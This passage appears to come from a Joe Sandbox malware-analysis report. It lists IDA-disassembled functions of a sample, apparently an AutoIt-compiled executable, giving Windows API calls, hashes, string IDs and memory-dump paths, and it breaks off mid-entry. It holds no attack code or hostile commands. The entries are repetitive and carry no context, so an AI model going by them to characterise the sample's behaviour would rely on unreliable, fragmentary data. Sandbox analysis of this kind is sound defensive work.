                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
                                                          • Instruction ID: 77d57e52c63b2e6ac818ebc984d61c6fe9b62518031c46ac105a4f7155e0cf64
                                                          • Opcode Fuzzy Hash: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
                                                          • Instruction Fuzzy Hash: AEE0C236004049FFDA121FE1EC4C91ABB6DFB89362B108330F219890F0CBB29460DB50
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B76EA
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7702
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,003EFB80,000000FF,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7727
                                                          • _memcmp.LIBCMT ref: 003B7748
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID: ,,?
                                                          • API String ID: 314563124-1094787077
                                                          • Opcode ID: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
                                                          • Instruction ID: b19f66157f973490f2283245980b17e2bc29bffdf320a842a5670a39c37cccbc
                                                          • Opcode Fuzzy Hash: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
                                                          • Instruction Fuzzy Hash: F6810D75A00109EFCB05DFA4C984EEEB7B9FF89315F214558F606AB250DB71AE06CB60
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003D8613
                                                          • CharUpperBuffW.USER32(?,?), ref: 003D8722
                                                          • VariantClear.OLEAUT32(?), ref: 003D889A
                                                            • Part of subcall function 003C7562: VariantInit.OLEAUT32(00000000), ref: 003C75A2
                                                            • Part of subcall function 003C7562: VariantCopy.OLEAUT32(00000000,?), ref: 003C75AB
                                                            • Part of subcall function 003C7562: VariantClear.OLEAUT32(00000000), ref: 003C75B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: f62d68443a88c04f97f8003a36b183f65b38042870c6adf7598a81d024dcb2de
                                                          • Instruction ID: 7cabd69306067ad946b410b535a6c5f43b05b92d01093dce76a3d7fc82d24174
                                                          • Opcode Fuzzy Hash: f62d68443a88c04f97f8003a36b183f65b38042870c6adf7598a81d024dcb2de
                                                          • Instruction Fuzzy Hash: 88918C72608301DFC711DF24C48495ABBE8EF89714F14896EF98A8B3A1DB31E905CB92
                                                          APIs
                                                            • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                          • _memset.LIBCMT ref: 003C2B87
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2BB6
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2C69
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003C2C97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 2a47d6633f7a8eb5eb923b410934ef5d10146d6d24391e61c714bf8b60e8f0e7
                                                          • Instruction ID: 9598dd7d267c4897114be43969e7689879fcbfd670f36371303676840a2d783c
                                                          • Opcode Fuzzy Hash: 2a47d6633f7a8eb5eb923b410934ef5d10146d6d24391e61c714bf8b60e8f0e7
                                                          • Instruction Fuzzy Hash: A251CC712083019ED726AF28D885F6FB7E8AF99310F058A2DF895D61A0DBB0DC048792
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_free
                                                          • String ID: 3c7$_7
                                                          • API String ID: 2620147621-4188345352
                                                          • Opcode ID: 84977687cf138eac788258bdfca685296dbe23e045516fb19a8f8af0188dd886
                                                          • Instruction ID: 120a1fd82065047b4ac1910f3bde8ee21addcef0d13b15d950bb7907ae88e133
                                                          • Opcode Fuzzy Hash: 84977687cf138eac788258bdfca685296dbe23e045516fb19a8f8af0188dd886
                                                          • Instruction Fuzzy Hash: C3518B716087418FDB3ACF29C581B6BBBE5EF85310F09882DE88987350DB35E905CB82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: 3c7$ERCP
                                                          • API String ID: 2532777613-2328722621
                                                          • Opcode ID: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
                                                          • Instruction ID: b8a556ff9b804136ef3fc1acb35c8681d0d419b86437d36485ba28d56a58dd1f
                                                          • Opcode Fuzzy Hash: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
                                                          • Instruction Fuzzy Hash: 9951A070900B05DBDB26DF65C9927EBB7F8EF04304F20896EE54ADB691E774AA44CB40
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C27C0
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003C27DC
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 003C2822
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00425890,00000000), ref: 003C286B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
                                                          • Instruction ID: e05482ef70037dcf86b16d9867ee06182ba2334b41b475e405958f4079e33ff3
                                                          • Opcode Fuzzy Hash: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
                                                          • Instruction Fuzzy Hash: 3A417C702043419FDB22EF25D884F5BBBA8AF85314F054A2DF965DB291DB70AC05CB62
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5
                                                            • Part of subcall function 0036784B: _memmove.LIBCMT ref: 00367899
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: 3d720ba13c2ead06950fa9bca23e6107782b5d8afb016cce8392d5bf25c26d10
                                                          • Instruction ID: be98efb75cef753cb87222d16e5fe9b1ca5b298673fdde6da47cb4d313d6e546
                                                          • Opcode Fuzzy Hash: 3d720ba13c2ead06950fa9bca23e6107782b5d8afb016cce8392d5bf25c26d10
                                                          • Instruction Fuzzy Hash: BC31A172904219ABCF06EF54C8519EEB3B4FF14320B10866AE8759B7D5DB71AD05CB80
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003B8F14
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003B8F27
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 003B8F57
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: 26cca00d123f47385d02583b5455d81908b547f69495d0f5e2a97dea0e77f0fd
                                                          • Instruction ID: 14aa81787e5c9e67294c862c5543683558dc0b2aa05774aed7f5b993aa683643
                                                          • Opcode Fuzzy Hash: 26cca00d123f47385d02583b5455d81908b547f69495d0f5e2a97dea0e77f0fd
                                                          • Instruction Fuzzy Hash: E621F071A04104BEDB16ABB0DC85DFFB76DDF05328F108629F5219B1E1DF394909D620
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1872
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003D18A2
                                                          • InternetCloseHandle.WININET(00000000), ref: 003D18E9
                                                            • Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
                                                            • Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
                                                          • Instruction ID: 0f0c449ee66fbe8907d42d2ddcd652d6b99b2d19f34036058ef62bfbc914eeae
                                                          • Opcode Fuzzy Hash: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
                                                          • Instruction Fuzzy Hash: 2E217FB2500208BFEB22DB65EC85EBB76EDEB48754F10412BF8059A340DA719D0567A1
                                                          APIs
                                                            • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                            • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                            • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003E6461
                                                          • LoadLibraryW.KERNEL32(?), ref: 003E6468
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003E647D
                                                          • DestroyWindow.USER32(?), ref: 003E6485
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
                                                          • Instruction ID: fb317abf870343457f114af52dfb8c5c8394c26f0045f6eb5f892ff9bf017f7a
                                                          • Opcode Fuzzy Hash: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
                                                          • Instruction Fuzzy Hash: B721CF712002A5BFEF124F66DC82EBB37ACEB683A4F114729F910961D0D771DC419B20
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003C6DBC
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6DEF
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003C6E01
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003C6E3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
                                                          • Instruction ID: 30b391039e59a8fc13043d970ca89f5a6c106efdb179e429ee18934f75527c23
                                                          • Opcode Fuzzy Hash: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
                                                          • Instruction Fuzzy Hash: 0321817560020AABDB219F29DC4AF9A77B8EF44720F204A2DFDA1DB2D0D7709D518B50
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003C6E89
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6EBB
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003C6ECC
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003C6F06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
                                                          • Instruction ID: c043e5d6e257ba6fc2082a71f4bff4c5ccf993d6776bbb0caaf5121b473cb8bf
                                                          • Opcode Fuzzy Hash: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
                                                          • Instruction Fuzzy Hash: 87218E795003059BDB219F79DD46FAA77A8AF45720F204A1EF9A0D72D0D770AC518B50
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003CAC54
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003CACA8
                                                          • __swprintf.LIBCMT ref: 003CACC1
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,003EF910), ref: 003CACFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
                                                          • Instruction ID: e4873a8ad682445ff86aeb75af7fa36b420be692b6c8fe791f9c75f616c0758d
                                                          • Opcode Fuzzy Hash: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
                                                          • Instruction Fuzzy Hash: CA216030A00109AFCB11EF65C985EEE7BBCEF49714B008569F909EB252DB71EA41CB61
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C115F
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C1184
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C118E
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C11C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID: @<
                                                          • API String ID: 2875609808-354047512
                                                          • Opcode ID: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
                                                          • Instruction ID: b0f1f435e29798892461cfc33c75a46dd0582fcb816632f954f9db39b3b5cb18
                                                          • Opcode Fuzzy Hash: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
                                                          • Instruction Fuzzy Hash: B4117C31C0061CDBCF029FA4D899BEEBB78FF0A711F054159EA40F6281CB749950DBA5
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 003C1B19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
                                                          • Instruction ID: 5ed369204e3c270ec8f6a3f269c52e27421baf413c813955601463ef42a3d31d
                                                          • Opcode Fuzzy Hash: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
                                                          • Instruction Fuzzy Hash: 3C118B349102089FCF09EFA4D8529EEB3B4FF26304B5084A9D814AB292EB325D0ADF50
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003DEC07
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003DEC37
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003DED6A
                                                          • CloseHandle.KERNEL32(?), ref: 003DEDEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
                                                          • Instruction ID: 80cfe6c10feeb007a31ed7f04cc7e92686aa0ef63bc83ad3f18c18e035b3df71
                                                          • Opcode Fuzzy Hash: f1382425acec286fbba3a6d06134d2b0d3cf8566c274b4c65a4805ea34a9d1d4
                                                          • Instruction Fuzzy Hash: F88152B16043009FD722EF18D886B2AB7E9AF59710F04891EF9559F3D2DA71AC408B51
                                                          APIs
                                                          Memory Dump Source
